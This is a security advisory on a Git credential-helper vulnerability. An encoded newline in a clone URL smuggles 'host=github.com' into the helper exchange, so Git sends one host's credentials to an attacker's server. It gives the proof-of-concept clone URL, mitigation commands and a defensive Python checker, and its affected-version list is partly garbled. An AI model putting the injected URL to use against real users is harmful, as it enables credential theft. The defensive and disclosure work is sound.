I. Vulnerability description

Git uses credential helpers to store and retrieve credentials for users. However, when a URL contains an encoded newline character, unexpected values may be injected into the credential helper protocol flow. A malicious URL can thereby trick Git into sending the credentials for another host to the attacker. The vulnerability is triggered when the git clone command is executed against a malicious URL using an affected version of Git.

II. Relevant versions

Affected version

X <= 2.18.2
Git 2.19.x <= 2.19.3
Git 2.20.x <= 2.20.2
Git 2.21.x <= 2.21.1
Git 2.22.x <= X <= 2.24.1
Git 2.25.x <= 2.25.2
Git 2.26.x <= 2.26.0

Unaffected version

Git 2.18.4
Git 2.19.4
Git 2.20.3
Git 2.21.2
Git 2.22.3
Git 2.23.2
Git 2.24.2
Git 2.25.3
Git 2.26.1

III. Vulnerability reproduction demonstration

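When Git executes a command such as “git clone example.com”, it asks the credential helper for the credentials stored for protocol “https” and host “example.com”, and appends the returned credentials to the outgoing request when the remote side requests authentication. In the URL below, each %0a decodes to a newline, so “host=github.com” and “protocol=https” reach the credential helper as separate lines: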

git clone 'http://localhost:8088/%0ahost=github.com%0aprotocol=https'

Executing a clone project

Git credentials have been obtained

IV. Vulnerability repair

A new version has been released that fixes the bug and affected users are advised to download the update as soon as possible.

Github.com/git/git/rel…

In addition, there are other ways to solve or circumvent the problem:

1. Disable the credential helper

git config --unset credential.helper
git config --global --unset credential.helper
git config --system --unset credential.helper

2. Beware of malicious URLs

1) Before running git clone, check whether the URL contains encoded newlines (%0a) or evidence of credential protocol injection (e.g. host=github.com).

2) Avoid using submodules with untrusted repositories (do not use clone --recurse-submodules; use git submodule update only after checking the URLs in .gitmodules).

3) Avoid git clone for untrusted URLs.
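
The checks in 1) and 2) above, as an added example (not code from the original article or from the Git project): it percent-decodes a URL, lists the lines a decoded newline would add to the credential helper exchange, and scans .gitmodules content for such URLs. The function names, the simplified protocol model and the sample .gitmodules text are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

def credential_fields(url):
    """Percent-decode the URL parts that become credential-protocol values.

    Simplified model (assumption): each part is written to the helper as one
    "key=value" line, so a decoded newline starts a new protocol line.
    """
    parts = urlsplit(url)
    return {
        "protocol": unquote(parts.scheme),
        "host": unquote(parts.netloc.rpartition("@")[2]),
        "path": unquote(parts.path.lstrip("/")),
    }

def injected_lines(url):
    """Lines that would follow a decoded newline, e.g. 'host=github.com'."""
    lines = []
    for value in credential_fields(url).values():
        lines += [line for line in re.split(r"[\r\n]", value)[1:] if line]
    return lines

def is_safe_git_url(url):
    """Reject a raw or percent-encoded CR/LF anywhere in the URL."""
    return re.search(r"[\r\n]", url + unquote(url)) is None

def unsafe_submodule_urls(gitmodules_text):
    """Return the 'url = ...' entries of .gitmodules text that fail the check."""
    urls = re.findall(r"^\s*url\s*=\s*(\S+)", gitmodules_text, re.M)
    return [u for u in urls if not is_safe_git_url(u)]

# Constructed sample input; PAGE_URL is the URL shown in section III.
PAGE_URL = "http://localhost:8088/%0ahost=github.com%0aprotocol=https"
SAMPLE_GITMODULES = (
    '[submodule "lib"]\n\tpath = lib\n\turl = https://example.com/lib.git\n'
    '[submodule "untrusted"]\n\tpath = untrusted\n\turl = ' + PAGE_URL + "\n"
)

if __name__ == "__main__":
    print(injected_lines(PAGE_URL))
    print(unsafe_submodule_urls(SAMPLE_GITMODULES))
```
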

